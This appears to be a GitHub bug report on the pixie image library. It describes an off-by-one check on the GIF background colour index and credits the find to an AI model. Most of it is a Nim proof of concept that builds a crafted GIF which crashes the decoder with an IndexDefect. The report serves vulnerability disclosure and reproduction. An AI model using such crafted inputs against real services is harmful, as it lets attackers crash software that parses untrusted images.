Off-by-one in GIF parsing #560
Description
https://github.com/treeform/pixie/blob/master/src/pixie/fileformats/gif.nim#L44 and https://github.com/treeform/pixie/blob/master/src/pixie/fileformats/gif.nim#L68 have an off-by-one check for bgColorIndex. A crafted GIF with a global table of size 2 and background index 2 passes validation, then crashes with IndexDefect when reading globalColorTable[bgColorIndex]
# Run: nim r --path:src pocs/gif_bgcolor_off_by_one.nim
import pixie/fileformats/gif
proc addLe16(data: var string, value: int) =
data.add(char(value and 0xff))
data.add(char((value shr 8) and 0xff))
var payload = "GIF89a"
payload.addLe16(1)
payload.addLe16(1)
payload.add(char(0x80)) # Global color table present, size = 2 entries.
payload.add(char(0x02)) # Off-by-one background color index.
payload.add(char(0x00))
payload.add("\x00\x00\x00\xff\xff\xff")
payload.add(char(0x3b))
echo "parsing crafted GIF with bgColorIndex == globalColorTableSize"
discard decodeGif(payload)Found by GPT 5.4.